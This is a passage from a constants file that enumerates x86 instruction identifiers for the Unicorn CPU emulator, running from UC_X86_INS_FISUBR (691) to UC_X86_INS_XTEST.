UC_X86_INS_FISUBR = 691 ' UC_X86_INS_FSUBRP = 692 ' UC_X86_INS_SUBSD = 693 ' UC_X86_INS_SUBSS = 694 ' UC_X86_INS_FSUB = 695 ' UC_X86_INS_FISUB = 696 ' UC_X86_INS_FSUBP = 697 ' UC_X86_INS_SWAPGS = 698 ' UC_X86_INS_SYSCALL = 699 ' UC_X86_INS_SYSENTER = 700 ' UC_X86_INS_SYSEXIT = 701 ' UC_X86_INS_SYSRET = 702 ' UC_X86_INS_T1MSKC = 703 ' UC_X86_INS_TEST = 704 ' UC_X86_INS_UD2 = 705 ' UC_X86_INS_FTST = 706 ' UC_X86_INS_TZCNT = 707 ' UC_X86_INS_TZMSK = 708 ' UC_X86_INS_FUCOMPI = 709 ' UC_X86_INS_FUCOMI = 710 ' UC_X86_INS_FUCOMPP = 711 ' UC_X86_INS_FUCOMP = 712 ' UC_X86_INS_FUCOM = 713 ' UC_X86_INS_UD2B = 714 ' UC_X86_INS_UNPCKHPD = 715 ' UC_X86_INS_UNPCKHPS = 716 ' UC_X86_INS_UNPCKLPD = 717 ' UC_X86_INS_UNPCKLPS = 718 ' UC_X86_INS_VADDPD = 719 ' UC_X86_INS_VADDPS = 720 ' UC_X86_INS_VADDSD = 721 ' UC_X86_INS_VADDSS = 722 ' UC_X86_INS_VADDSUBPD = 723 ' UC_X86_INS_VADDSUBPS = 724 ' UC_X86_INS_VAESDECLAST = 725 ' UC_X86_INS_VAESDEC = 726 ' UC_X86_INS_VAESENCLAST = 727 ' UC_X86_INS_VAESENC = 728 ' UC_X86_INS_VAESIMC = 729 ' UC_X86_INS_VAESKEYGENASSIST = 730 ' UC_X86_INS_VALIGND = 731 ' UC_X86_INS_VALIGNQ = 732 ' UC_X86_INS_VANDNPD = 733 ' UC_X86_INS_VANDNPS = 734 ' UC_X86_INS_VANDPD = 735 ' UC_X86_INS_VANDPS = 736 ' UC_X86_INS_VBLENDMPD = 737 ' UC_X86_INS_VBLENDMPS = 738 ' UC_X86_INS_VBLENDPD = 739 ' UC_X86_INS_VBLENDPS = 740 ' UC_X86_INS_VBLENDVPD = 741 ' UC_X86_INS_VBLENDVPS = 742 ' UC_X86_INS_VBROADCASTF128 = 743 ' UC_X86_INS_VBROADCASTI32X4 = 744 ' UC_X86_INS_VBROADCASTI64X4 = 745 ' UC_X86_INS_VBROADCASTSD = 746 ' UC_X86_INS_VBROADCASTSS = 747 ' UC_X86_INS_VCMPPD = 748 ' UC_X86_INS_VCMPPS = 749 ' UC_X86_INS_VCMPSD = 750 ' UC_X86_INS_VCMPSS = 751 ' UC_X86_INS_VCOMPRESSPD = 752 ' UC_X86_INS_VCOMPRESSPS = 753 ' UC_X86_INS_VCVTDQ2PD = 754 ' UC_X86_INS_VCVTDQ2PS = 755 ' UC_X86_INS_VCVTPD2DQX = 756 ' UC_X86_INS_VCVTPD2DQ = 757 ' UC_X86_INS_VCVTPD2PSX = 758 ' UC_X86_INS_VCVTPD2PS = 759 ' UC_X86_INS_VCVTPD2UDQ = 760 ' UC_X86_INS_VCVTPH2PS = 761 ' UC_X86_INS_VCVTPS2DQ = 762 ' UC_X86_INS_VCVTPS2PD = 763 ' UC_X86_INS_VCVTPS2PH = 764 ' UC_X86_INS_VCVTPS2UDQ = 765 ' UC_X86_INS_VCVTSD2SI = 766 ' UC_X86_INS_VCVTSD2USI = 767 ' UC_X86_INS_VCVTSS2SI = 768 ' UC_X86_INS_VCVTSS2USI = 769 ' UC_X86_INS_VCVTTPD2DQX = 770 ' UC_X86_INS_VCVTTPD2DQ = 771 ' UC_X86_INS_VCVTTPD2UDQ = 772 ' UC_X86_INS_VCVTTPS2DQ = 773 ' UC_X86_INS_VCVTTPS2UDQ = 774 ' UC_X86_INS_VCVTUDQ2PD = 775 ' UC_X86_INS_VCVTUDQ2PS = 776 ' UC_X86_INS_VDIVPD = 777 ' UC_X86_INS_VDIVPS = 778 ' UC_X86_INS_VDIVSD = 779 ' UC_X86_INS_VDIVSS = 780 ' UC_X86_INS_VDPPD = 781 ' UC_X86_INS_VDPPS = 782 ' UC_X86_INS_VERR = 783 ' UC_X86_INS_VERW = 784 ' UC_X86_INS_VEXP2PD = 785 ' UC_X86_INS_VEXP2PS = 786 ' UC_X86_INS_VEXPANDPD = 787 ' UC_X86_INS_VEXPANDPS = 788 ' UC_X86_INS_VEXTRACTF128 = 789 ' UC_X86_INS_VEXTRACTF32X4 = 790 ' UC_X86_INS_VEXTRACTF64X4 = 791 ' UC_X86_INS_VEXTRACTI128 = 792 ' UC_X86_INS_VEXTRACTI32X4 = 793 ' UC_X86_INS_VEXTRACTI64X4 = 794 ' UC_X86_INS_VEXTRACTPS = 795 ' UC_X86_INS_VFMADD132PD = 796 ' UC_X86_INS_VFMADD132PS = 797 ' UC_X86_INS_VFMADDPD = 798 ' UC_X86_INS_VFMADD213PD = 799 ' UC_X86_INS_VFMADD231PD = 800 ' UC_X86_INS_VFMADDPS = 801 ' UC_X86_INS_VFMADD213PS = 802 ' UC_X86_INS_VFMADD231PS = 803 ' UC_X86_INS_VFMADDSD = 804 ' UC_X86_INS_VFMADD213SD = 805 ' UC_X86_INS_VFMADD132SD = 806 ' UC_X86_INS_VFMADD231SD = 807 ' UC_X86_INS_VFMADDSS = 808 ' UC_X86_INS_VFMADD213SS = 809 ' UC_X86_INS_VFMADD132SS = 810 ' UC_X86_INS_VFMADD231SS = 811 ' UC_X86_INS_VFMADDSUB132PD = 812 ' UC_X86_INS_VFMADDSUB132PS = 813 ' UC_X86_INS_VFMADDSUBPD = 814 ' 
UC_X86_INS_VFMADDSUB213PD = 815 ' UC_X86_INS_VFMADDSUB231PD = 816 ' UC_X86_INS_VFMADDSUBPS = 817 ' UC_X86_INS_VFMADDSUB213PS = 818 ' UC_X86_INS_VFMADDSUB231PS = 819 ' UC_X86_INS_VFMSUB132PD = 820 ' UC_X86_INS_VFMSUB132PS = 821 ' UC_X86_INS_VFMSUBADD132PD = 822 ' UC_X86_INS_VFMSUBADD132PS = 823 ' UC_X86_INS_VFMSUBADDPD = 824 ' UC_X86_INS_VFMSUBADD213PD = 825 ' UC_X86_INS_VFMSUBADD231PD = 826 ' UC_X86_INS_VFMSUBADDPS = 827 ' UC_X86_INS_VFMSUBADD213PS = 828 ' UC_X86_INS_VFMSUBADD231PS = 829 ' UC_X86_INS_VFMSUBPD = 830 ' UC_X86_INS_VFMSUB213PD = 831 ' UC_X86_INS_VFMSUB231PD = 832 ' UC_X86_INS_VFMSUBPS = 833 ' UC_X86_INS_VFMSUB213PS = 834 ' UC_X86_INS_VFMSUB231PS = 835 ' UC_X86_INS_VFMSUBSD = 836 ' UC_X86_INS_VFMSUB213SD = 837 ' UC_X86_INS_VFMSUB132SD = 838 ' UC_X86_INS_VFMSUB231SD = 839 ' UC_X86_INS_VFMSUBSS = 840 ' UC_X86_INS_VFMSUB213SS = 841 ' UC_X86_INS_VFMSUB132SS = 842 ' UC_X86_INS_VFMSUB231SS = 843 ' UC_X86_INS_VFNMADD132PD = 844 ' UC_X86_INS_VFNMADD132PS = 845 ' UC_X86_INS_VFNMADDPD = 846 ' UC_X86_INS_VFNMADD213PD = 847 ' UC_X86_INS_VFNMADD231PD = 848 ' UC_X86_INS_VFNMADDPS = 849 ' UC_X86_INS_VFNMADD213PS = 850 ' UC_X86_INS_VFNMADD231PS = 851 ' UC_X86_INS_VFNMADDSD = 852 ' UC_X86_INS_VFNMADD213SD = 853 ' UC_X86_INS_VFNMADD132SD = 854 ' UC_X86_INS_VFNMADD231SD = 855 ' UC_X86_INS_VFNMADDSS = 856 ' UC_X86_INS_VFNMADD213SS = 857 ' UC_X86_INS_VFNMADD132SS = 858 ' UC_X86_INS_VFNMADD231SS = 859 ' UC_X86_INS_VFNMSUB132PD = 860 ' UC_X86_INS_VFNMSUB132PS = 861 ' UC_X86_INS_VFNMSUBPD = 862 ' UC_X86_INS_VFNMSUB213PD = 863 ' UC_X86_INS_VFNMSUB231PD = 864 ' UC_X86_INS_VFNMSUBPS = 865 ' UC_X86_INS_VFNMSUB213PS = 866 ' UC_X86_INS_VFNMSUB231PS = 867 ' UC_X86_INS_VFNMSUBSD = 868 ' UC_X86_INS_VFNMSUB213SD = 869 ' UC_X86_INS_VFNMSUB132SD = 870 ' UC_X86_INS_VFNMSUB231SD = 871 ' UC_X86_INS_VFNMSUBSS = 872 ' UC_X86_INS_VFNMSUB213SS = 873 ' UC_X86_INS_VFNMSUB132SS = 874 ' UC_X86_INS_VFNMSUB231SS = 875 ' UC_X86_INS_VFRCZPD = 876 ' UC_X86_INS_VFRCZPS = 877 ' UC_X86_INS_VFRCZSD = 878 ' UC_X86_INS_VFRCZSS = 879 ' UC_X86_INS_VORPD = 880 ' UC_X86_INS_VORPS = 881 ' UC_X86_INS_VXORPD = 882 ' UC_X86_INS_VXORPS = 883 ' UC_X86_INS_VGATHERDPD = 884 ' UC_X86_INS_VGATHERDPS = 885 ' UC_X86_INS_VGATHERPF0DPD = 886 ' UC_X86_INS_VGATHERPF0DPS = 887 ' UC_X86_INS_VGATHERPF0QPD = 888 ' UC_X86_INS_VGATHERPF0QPS = 889 ' UC_X86_INS_VGATHERPF1DPD = 890 ' UC_X86_INS_VGATHERPF1DPS = 891 ' UC_X86_INS_VGATHERPF1QPD = 892 ' UC_X86_INS_VGATHERPF1QPS = 893 ' UC_X86_INS_VGATHERQPD = 894 ' UC_X86_INS_VGATHERQPS = 895 ' UC_X86_INS_VHADDPD = 896 ' UC_X86_INS_VHADDPS = 897 ' UC_X86_INS_VHSUBPD = 898 ' UC_X86_INS_VHSUBPS = 899 ' UC_X86_INS_VINSERTF128 = 900 ' UC_X86_INS_VINSERTF32X4 = 901 ' UC_X86_INS_VINSERTF32X8 = 902 ' UC_X86_INS_VINSERTF64X2 = 903 ' UC_X86_INS_VINSERTF64X4 = 904 ' UC_X86_INS_VINSERTI128 = 905 ' UC_X86_INS_VINSERTI32X4 = 906 ' UC_X86_INS_VINSERTI32X8 = 907 ' UC_X86_INS_VINSERTI64X2 = 908 ' UC_X86_INS_VINSERTI64X4 = 909 ' UC_X86_INS_VINSERTPS = 910 ' UC_X86_INS_VLDDQU = 911 ' UC_X86_INS_VLDMXCSR = 912 ' UC_X86_INS_VMASKMOVDQU = 913 ' UC_X86_INS_VMASKMOVPD = 914 ' UC_X86_INS_VMASKMOVPS = 915 ' UC_X86_INS_VMAXPD = 916 ' UC_X86_INS_VMAXPS = 917 ' UC_X86_INS_VMAXSD = 918 ' UC_X86_INS_VMAXSS = 919 ' UC_X86_INS_VMCALL = 920 ' UC_X86_INS_VMCLEAR = 921 ' UC_X86_INS_VMFUNC = 922 ' UC_X86_INS_VMINPD = 923 ' UC_X86_INS_VMINPS = 924 ' UC_X86_INS_VMINSD = 925 ' UC_X86_INS_VMINSS = 926 ' UC_X86_INS_VMLAUNCH = 927 ' UC_X86_INS_VMLOAD = 928 ' UC_X86_INS_VMMCALL = 929 ' UC_X86_INS_VMOVQ = 930 ' UC_X86_INS_VMOVDDUP = 931 ' UC_X86_INS_VMOVD = 932 
' UC_X86_INS_VMOVDQA32 = 933 ' UC_X86_INS_VMOVDQA64 = 934 ' UC_X86_INS_VMOVDQA = 935 ' UC_X86_INS_VMOVDQU16 = 936 ' UC_X86_INS_VMOVDQU32 = 937 ' UC_X86_INS_VMOVDQU64 = 938 ' UC_X86_INS_VMOVDQU8 = 939 ' UC_X86_INS_VMOVDQU = 940 ' UC_X86_INS_VMOVHLPS = 941 ' UC_X86_INS_VMOVHPD = 942 ' UC_X86_INS_VMOVHPS = 943 ' UC_X86_INS_VMOVLHPS = 944 ' UC_X86_INS_VMOVLPD = 945 ' UC_X86_INS_VMOVLPS = 946 ' UC_X86_INS_VMOVMSKPD = 947 ' UC_X86_INS_VMOVMSKPS = 948 ' UC_X86_INS_VMOVNTDQA = 949 ' UC_X86_INS_VMOVNTDQ = 950 ' UC_X86_INS_VMOVNTPD = 951 ' UC_X86_INS_VMOVNTPS = 952 ' UC_X86_INS_VMOVSD = 953 ' UC_X86_INS_VMOVSHDUP = 954 ' UC_X86_INS_VMOVSLDUP = 955 ' UC_X86_INS_VMOVSS = 956 ' UC_X86_INS_VMOVUPD = 957 ' UC_X86_INS_VMOVUPS = 958 ' UC_X86_INS_VMPSADBW = 959 ' UC_X86_INS_VMPTRLD = 960 ' UC_X86_INS_VMPTRST = 961 ' UC_X86_INS_VMREAD = 962 ' UC_X86_INS_VMRESUME = 963 ' UC_X86_INS_VMRUN = 964 ' UC_X86_INS_VMSAVE = 965 ' UC_X86_INS_VMULPD = 966 ' UC_X86_INS_VMULPS = 967 ' UC_X86_INS_VMULSD = 968 ' UC_X86_INS_VMULSS = 969 ' UC_X86_INS_VMWRITE = 970 ' UC_X86_INS_VMXOFF = 971 ' UC_X86_INS_VMXON = 972 ' UC_X86_INS_VPABSB = 973 ' UC_X86_INS_VPABSD = 974 ' UC_X86_INS_VPABSQ = 975 ' UC_X86_INS_VPABSW = 976 ' UC_X86_INS_VPACKSSDW = 977 ' UC_X86_INS_VPACKSSWB = 978 ' UC_X86_INS_VPACKUSDW = 979 ' UC_X86_INS_VPACKUSWB = 980 ' UC_X86_INS_VPADDB = 981 ' UC_X86_INS_VPADDD = 982 ' UC_X86_INS_VPADDQ = 983 ' UC_X86_INS_VPADDSB = 984 ' UC_X86_INS_VPADDSW = 985 ' UC_X86_INS_VPADDUSB = 986 ' UC_X86_INS_VPADDUSW = 987 ' UC_X86_INS_VPADDW = 988 ' UC_X86_INS_VPALIGNR = 989 ' UC_X86_INS_VPANDD = 990 ' UC_X86_INS_VPANDND = 991 ' UC_X86_INS_VPANDNQ = 992 ' UC_X86_INS_VPANDN = 993 ' UC_X86_INS_VPANDQ = 994 ' UC_X86_INS_VPAND = 995 ' UC_X86_INS_VPAVGB = 996 ' UC_X86_INS_VPAVGW = 997 ' UC_X86_INS_VPBLENDD = 998 ' UC_X86_INS_VPBLENDMB = 999 ' UC_X86_INS_VPBLENDMD = 1000 ' UC_X86_INS_VPBLENDMQ = 1001 ' UC_X86_INS_VPBLENDMW = 1002 ' UC_X86_INS_VPBLENDVB = 1003 ' UC_X86_INS_VPBLENDW = 1004 ' UC_X86_INS_VPBROADCASTB = 1005 ' UC_X86_INS_VPBROADCASTD = 1006 ' UC_X86_INS_VPBROADCASTMB2Q = 1007 ' UC_X86_INS_VPBROADCASTMW2D = 1008 ' UC_X86_INS_VPBROADCASTQ = 1009 ' UC_X86_INS_VPBROADCASTW = 1010 ' UC_X86_INS_VPCLMULQDQ = 1011 ' UC_X86_INS_VPCMOV = 1012 ' UC_X86_INS_VPCMPB = 1013 ' UC_X86_INS_VPCMPD = 1014 ' UC_X86_INS_VPCMPEQB = 1015 ' UC_X86_INS_VPCMPEQD = 1016 ' UC_X86_INS_VPCMPEQQ = 1017 ' UC_X86_INS_VPCMPEQW = 1018 ' UC_X86_INS_VPCMPESTRI = 1019 ' UC_X86_INS_VPCMPESTRM = 1020 ' UC_X86_INS_VPCMPGTB = 1021 ' UC_X86_INS_VPCMPGTD = 1022 ' UC_X86_INS_VPCMPGTQ = 1023 ' UC_X86_INS_VPCMPGTW = 1024 ' UC_X86_INS_VPCMPISTRI = 1025 ' UC_X86_INS_VPCMPISTRM = 1026 ' UC_X86_INS_VPCMPQ = 1027 ' UC_X86_INS_VPCMPUB = 1028 ' UC_X86_INS_VPCMPUD = 1029 ' UC_X86_INS_VPCMPUQ = 1030 ' UC_X86_INS_VPCMPUW = 1031 ' UC_X86_INS_VPCMPW = 1032 ' UC_X86_INS_VPCOMB = 1033 ' UC_X86_INS_VPCOMD = 1034 ' UC_X86_INS_VPCOMPRESSD = 1035 ' UC_X86_INS_VPCOMPRESSQ = 1036 ' UC_X86_INS_VPCOMQ = 1037 ' UC_X86_INS_VPCOMUB = 1038 ' UC_X86_INS_VPCOMUD = 1039 ' UC_X86_INS_VPCOMUQ = 1040 ' UC_X86_INS_VPCOMUW = 1041 ' UC_X86_INS_VPCOMW = 1042 ' UC_X86_INS_VPCONFLICTD = 1043 ' UC_X86_INS_VPCONFLICTQ = 1044 ' UC_X86_INS_VPERM2F128 = 1045 ' UC_X86_INS_VPERM2I128 = 1046 ' UC_X86_INS_VPERMD = 1047 ' UC_X86_INS_VPERMI2D = 1048 ' UC_X86_INS_VPERMI2PD = 1049 ' UC_X86_INS_VPERMI2PS = 1050 ' UC_X86_INS_VPERMI2Q = 1051 ' UC_X86_INS_VPERMIL2PD = 1052 ' UC_X86_INS_VPERMIL2PS = 1053 ' UC_X86_INS_VPERMILPD = 1054 ' UC_X86_INS_VPERMILPS = 1055 ' UC_X86_INS_VPERMPD = 1056 ' UC_X86_INS_VPERMPS = 1057 ' 
UC_X86_INS_VPERMQ = 1058 ' UC_X86_INS_VPERMT2D = 1059 ' UC_X86_INS_VPERMT2PD = 1060 ' UC_X86_INS_VPERMT2PS = 1061 ' UC_X86_INS_VPERMT2Q = 1062 ' UC_X86_INS_VPEXPANDD = 1063 ' UC_X86_INS_VPEXPANDQ = 1064 ' UC_X86_INS_VPEXTRB = 1065 ' UC_X86_INS_VPEXTRD = 1066 ' UC_X86_INS_VPEXTRQ = 1067 ' UC_X86_INS_VPEXTRW = 1068 ' UC_X86_INS_VPGATHERDD = 1069 ' UC_X86_INS_VPGATHERDQ = 1070 ' UC_X86_INS_VPGATHERQD = 1071 ' UC_X86_INS_VPGATHERQQ = 1072 ' UC_X86_INS_VPHADDBD = 1073 ' UC_X86_INS_VPHADDBQ = 1074 ' UC_X86_INS_VPHADDBW = 1075 ' UC_X86_INS_VPHADDDQ = 1076 ' UC_X86_INS_VPHADDD = 1077 ' UC_X86_INS_VPHADDSW = 1078 ' UC_X86_INS_VPHADDUBD = 1079 ' UC_X86_INS_VPHADDUBQ = 1080 ' UC_X86_INS_VPHADDUBW = 1081 ' UC_X86_INS_VPHADDUDQ = 1082 ' UC_X86_INS_VPHADDUWD = 1083 ' UC_X86_INS_VPHADDUWQ = 1084 ' UC_X86_INS_VPHADDWD = 1085 ' UC_X86_INS_VPHADDWQ = 1086 ' UC_X86_INS_VPHADDW = 1087 ' UC_X86_INS_VPHMINPOSUW = 1088 ' UC_X86_INS_VPHSUBBW = 1089 ' UC_X86_INS_VPHSUBDQ = 1090 ' UC_X86_INS_VPHSUBD = 1091 ' UC_X86_INS_VPHSUBSW = 1092 ' UC_X86_INS_VPHSUBWD = 1093 ' UC_X86_INS_VPHSUBW = 1094 ' UC_X86_INS_VPINSRB = 1095 ' UC_X86_INS_VPINSRD = 1096 ' UC_X86_INS_VPINSRQ = 1097 ' UC_X86_INS_VPINSRW = 1098 ' UC_X86_INS_VPLZCNTD = 1099 ' UC_X86_INS_VPLZCNTQ = 1100 ' UC_X86_INS_VPMACSDD = 1101 ' UC_X86_INS_VPMACSDQH = 1102 ' UC_X86_INS_VPMACSDQL = 1103 ' UC_X86_INS_VPMACSSDD = 1104 ' UC_X86_INS_VPMACSSDQH = 1105 ' UC_X86_INS_VPMACSSDQL = 1106 ' UC_X86_INS_VPMACSSWD = 1107 ' UC_X86_INS_VPMACSSWW = 1108 ' UC_X86_INS_VPMACSWD = 1109 ' UC_X86_INS_VPMACSWW = 1110 ' UC_X86_INS_VPMADCSSWD = 1111 ' UC_X86_INS_VPMADCSWD = 1112 ' UC_X86_INS_VPMADDUBSW = 1113 ' UC_X86_INS_VPMADDWD = 1114 ' UC_X86_INS_VPMASKMOVD = 1115 ' UC_X86_INS_VPMASKMOVQ = 1116 ' UC_X86_INS_VPMAXSB = 1117 ' UC_X86_INS_VPMAXSD = 1118 ' UC_X86_INS_VPMAXSQ = 1119 ' UC_X86_INS_VPMAXSW = 1120 ' UC_X86_INS_VPMAXUB = 1121 ' UC_X86_INS_VPMAXUD = 1122 ' UC_X86_INS_VPMAXUQ = 1123 ' UC_X86_INS_VPMAXUW = 1124 ' UC_X86_INS_VPMINSB = 1125 ' UC_X86_INS_VPMINSD = 1126 ' UC_X86_INS_VPMINSQ = 1127 ' UC_X86_INS_VPMINSW = 1128 ' UC_X86_INS_VPMINUB = 1129 ' UC_X86_INS_VPMINUD = 1130 ' UC_X86_INS_VPMINUQ = 1131 ' UC_X86_INS_VPMINUW = 1132 ' UC_X86_INS_VPMOVDB = 1133 ' UC_X86_INS_VPMOVDW = 1134 ' UC_X86_INS_VPMOVM2B = 1135 ' UC_X86_INS_VPMOVM2D = 1136 ' UC_X86_INS_VPMOVM2Q = 1137 ' UC_X86_INS_VPMOVM2W = 1138 ' UC_X86_INS_VPMOVMSKB = 1139 ' UC_X86_INS_VPMOVQB = 1140 ' UC_X86_INS_VPMOVQD = 1141 ' UC_X86_INS_VPMOVQW = 1142 ' UC_X86_INS_VPMOVSDB = 1143 ' UC_X86_INS_VPMOVSDW = 1144 ' UC_X86_INS_VPMOVSQB = 1145 ' UC_X86_INS_VPMOVSQD = 1146 ' UC_X86_INS_VPMOVSQW = 1147 ' UC_X86_INS_VPMOVSXBD = 1148 ' UC_X86_INS_VPMOVSXBQ = 1149 ' UC_X86_INS_VPMOVSXBW = 1150 ' UC_X86_INS_VPMOVSXDQ = 1151 ' UC_X86_INS_VPMOVSXWD = 1152 ' UC_X86_INS_VPMOVSXWQ = 1153 ' UC_X86_INS_VPMOVUSDB = 1154 ' UC_X86_INS_VPMOVUSDW = 1155 ' UC_X86_INS_VPMOVUSQB = 1156 ' UC_X86_INS_VPMOVUSQD = 1157 ' UC_X86_INS_VPMOVUSQW = 1158 ' UC_X86_INS_VPMOVZXBD = 1159 ' UC_X86_INS_VPMOVZXBQ = 1160 ' UC_X86_INS_VPMOVZXBW = 1161 ' UC_X86_INS_VPMOVZXDQ = 1162 ' UC_X86_INS_VPMOVZXWD = 1163 ' UC_X86_INS_VPMOVZXWQ = 1164 ' UC_X86_INS_VPMULDQ = 1165 ' UC_X86_INS_VPMULHRSW = 1166 ' UC_X86_INS_VPMULHUW = 1167 ' UC_X86_INS_VPMULHW = 1168 ' UC_X86_INS_VPMULLD = 1169 ' UC_X86_INS_VPMULLQ = 1170 ' UC_X86_INS_VPMULLW = 1171 ' UC_X86_INS_VPMULUDQ = 1172 ' UC_X86_INS_VPORD = 1173 ' UC_X86_INS_VPORQ = 1174 ' UC_X86_INS_VPOR = 1175 ' UC_X86_INS_VPPERM = 1176 ' UC_X86_INS_VPROTB = 1177 ' UC_X86_INS_VPROTD = 1178 ' UC_X86_INS_VPROTQ = 1179 ' 
UC_X86_INS_VPROTW = 1180 ' UC_X86_INS_VPSADBW = 1181 ' UC_X86_INS_VPSCATTERDD = 1182 ' UC_X86_INS_VPSCATTERDQ = 1183 ' UC_X86_INS_VPSCATTERQD = 1184 ' UC_X86_INS_VPSCATTERQQ = 1185 ' UC_X86_INS_VPSHAB = 1186 ' UC_X86_INS_VPSHAD = 1187 ' UC_X86_INS_VPSHAQ = 1188 ' UC_X86_INS_VPSHAW = 1189 ' UC_X86_INS_VPSHLB = 1190 ' UC_X86_INS_VPSHLD = 1191 ' UC_X86_INS_VPSHLQ = 1192 ' UC_X86_INS_VPSHLW = 1193 ' UC_X86_INS_VPSHUFB = 1194 ' UC_X86_INS_VPSHUFD = 1195 ' UC_X86_INS_VPSHUFHW = 1196 ' UC_X86_INS_VPSHUFLW = 1197 ' UC_X86_INS_VPSIGNB = 1198 ' UC_X86_INS_VPSIGND = 1199 ' UC_X86_INS_VPSIGNW = 1200 ' UC_X86_INS_VPSLLDQ = 1201 ' UC_X86_INS_VPSLLD = 1202 ' UC_X86_INS_VPSLLQ = 1203 ' UC_X86_INS_VPSLLVD = 1204 ' UC_X86_INS_VPSLLVQ = 1205 ' UC_X86_INS_VPSLLW = 1206 ' UC_X86_INS_VPSRAD = 1207 ' UC_X86_INS_VPSRAQ = 1208 ' UC_X86_INS_VPSRAVD = 1209 ' UC_X86_INS_VPSRAVQ = 1210 ' UC_X86_INS_VPSRAW = 1211 ' UC_X86_INS_VPSRLDQ = 1212 ' UC_X86_INS_VPSRLD = 1213 ' UC_X86_INS_VPSRLQ = 1214 ' UC_X86_INS_VPSRLVD = 1215 ' UC_X86_INS_VPSRLVQ = 1216 ' UC_X86_INS_VPSRLW = 1217 ' UC_X86_INS_VPSUBB = 1218 ' UC_X86_INS_VPSUBD = 1219 ' UC_X86_INS_VPSUBQ = 1220 ' UC_X86_INS_VPSUBSB = 1221 ' UC_X86_INS_VPSUBSW = 1222 ' UC_X86_INS_VPSUBUSB = 1223 ' UC_X86_INS_VPSUBUSW = 1224 ' UC_X86_INS_VPSUBW = 1225 ' UC_X86_INS_VPTESTMD = 1226 ' UC_X86_INS_VPTESTMQ = 1227 ' UC_X86_INS_VPTESTNMD = 1228 ' UC_X86_INS_VPTESTNMQ = 1229 ' UC_X86_INS_VPTEST = 1230 ' UC_X86_INS_VPUNPCKHBW = 1231 ' UC_X86_INS_VPUNPCKHDQ = 1232 ' UC_X86_INS_VPUNPCKHQDQ = 1233 ' UC_X86_INS_VPUNPCKHWD = 1234 ' UC_X86_INS_VPUNPCKLBW = 1235 ' UC_X86_INS_VPUNPCKLDQ = 1236 ' UC_X86_INS_VPUNPCKLQDQ = 1237 ' UC_X86_INS_VPUNPCKLWD = 1238 ' UC_X86_INS_VPXORD = 1239 ' UC_X86_INS_VPXORQ = 1240 ' UC_X86_INS_VPXOR = 1241 ' UC_X86_INS_VRCP14PD = 1242 ' UC_X86_INS_VRCP14PS = 1243 ' UC_X86_INS_VRCP14SD = 1244 ' UC_X86_INS_VRCP14SS = 1245 ' UC_X86_INS_VRCP28PD = 1246 ' UC_X86_INS_VRCP28PS = 1247 ' UC_X86_INS_VRCP28SD = 1248 ' UC_X86_INS_VRCP28SS = 1249 ' UC_X86_INS_VRCPPS = 1250 ' UC_X86_INS_VRCPSS = 1251 ' UC_X86_INS_VRNDSCALEPD = 1252 ' UC_X86_INS_VRNDSCALEPS = 1253 ' UC_X86_INS_VRNDSCALESD = 1254 ' UC_X86_INS_VRNDSCALESS = 1255 ' UC_X86_INS_VROUNDPD = 1256 ' UC_X86_INS_VROUNDPS = 1257 ' UC_X86_INS_VROUNDSD = 1258 ' UC_X86_INS_VROUNDSS = 1259 ' UC_X86_INS_VRSQRT14PD = 1260 ' UC_X86_INS_VRSQRT14PS = 1261 ' UC_X86_INS_VRSQRT14SD = 1262 ' UC_X86_INS_VRSQRT14SS = 1263 ' UC_X86_INS_VRSQRT28PD = 1264 ' UC_X86_INS_VRSQRT28PS = 1265 ' UC_X86_INS_VRSQRT28SD = 1266 ' UC_X86_INS_VRSQRT28SS = 1267 ' UC_X86_INS_VRSQRTPS = 1268 ' UC_X86_INS_VRSQRTSS = 1269 ' UC_X86_INS_VSCATTERDPD = 1270 ' UC_X86_INS_VSCATTERDPS = 1271 ' UC_X86_INS_VSCATTERPF0DPD = 1272 ' UC_X86_INS_VSCATTERPF0DPS = 1273 ' UC_X86_INS_VSCATTERPF0QPD = 1274 ' UC_X86_INS_VSCATTERPF0QPS = 1275 ' UC_X86_INS_VSCATTERPF1DPD = 1276 ' UC_X86_INS_VSCATTERPF1DPS = 1277 ' UC_X86_INS_VSCATTERPF1QPD = 1278 ' UC_X86_INS_VSCATTERPF1QPS = 1279 ' UC_X86_INS_VSCATTERQPD = 1280 ' UC_X86_INS_VSCATTERQPS = 1281 ' UC_X86_INS_VSHUFPD = 1282 ' UC_X86_INS_VSHUFPS = 1283 ' UC_X86_INS_VSQRTPD = 1284 ' UC_X86_INS_VSQRTPS = 1285 ' UC_X86_INS_VSQRTSD = 1286 ' UC_X86_INS_VSQRTSS = 1287 ' UC_X86_INS_VSTMXCSR = 1288 ' UC_X86_INS_VSUBPD = 1289 ' UC_X86_INS_VSUBPS = 1290 ' UC_X86_INS_VSUBSD = 1291 ' UC_X86_INS_VSUBSS = 1292 ' UC_X86_INS_VTESTPD = 1293 ' UC_X86_INS_VTESTPS = 1294 ' UC_X86_INS_VUNPCKHPD = 1295 ' UC_X86_INS_VUNPCKHPS = 1296 ' UC_X86_INS_VUNPCKLPD = 1297 ' UC_X86_INS_VUNPCKLPS = 1298 ' UC_X86_INS_VZEROALL = 1299 ' UC_X86_INS_VZEROUPPER = 1300 ' 
UC_X86_INS_WAIT = 1301 ' UC_X86_INS_WBINVD = 1302 ' UC_X86_INS_WRFSBASE = 1303 ' UC_X86_INS_WRGSBASE = 1304 ' UC_X86_INS_WRMSR = 1305 ' UC_X86_INS_XABORT = 1306 ' UC_X86_INS_XACQUIRE = 1307 ' UC_X86_INS_XBEGIN = 1308 ' UC_X86_INS_XCHG = 1309 ' UC_X86_INS_XCRYPTCBC = 1310 ' UC_X86_INS_XCRYPTCFB = 1311 ' UC_X86_INS_XCRYPTCTR = 1312 ' UC_X86_INS_XCRYPTECB = 1313 ' UC_X86_INS_XCRYPTOFB = 1314 ' UC_X86_INS_XEND = 1315 ' UC_X86_INS_XGETBV = 1316 ' UC_X86_INS_XLATB = 1317 ' UC_X86_INS_XRELEASE = 1318 ' UC_X86_INS_XRSTOR = 1319 ' UC_X86_INS_XRSTOR64 = 1320 ' UC_X86_INS_XRSTORS = 1321 ' UC_X86_INS_XRSTORS64 = 1322 ' UC_X86_INS_XSAVE = 1323 ' UC_X86_INS_XSAVE64 = 1324 ' UC_X86_INS_XSAVEC = 1325 ' UC_X86_INS_XSAVEC64 = 1326 ' UC_X86_INS_XSAVEOPT = 1327 ' UC_X86_INS_XSAVEOPT64 = 1328 ' UC_X86_INS_XSAVES = 1329 ' UC_X86_INS_XSAVES64 = 1330 ' UC_X86_INS_XSETBV = 1331 ' UC_X86_INS_XSHA1 = 1332 ' UC_X86_INS_XSHA256 = 1333 ' UC_X86_INS_XSTORE = 1334 ' UC_X86_INS_XTEST 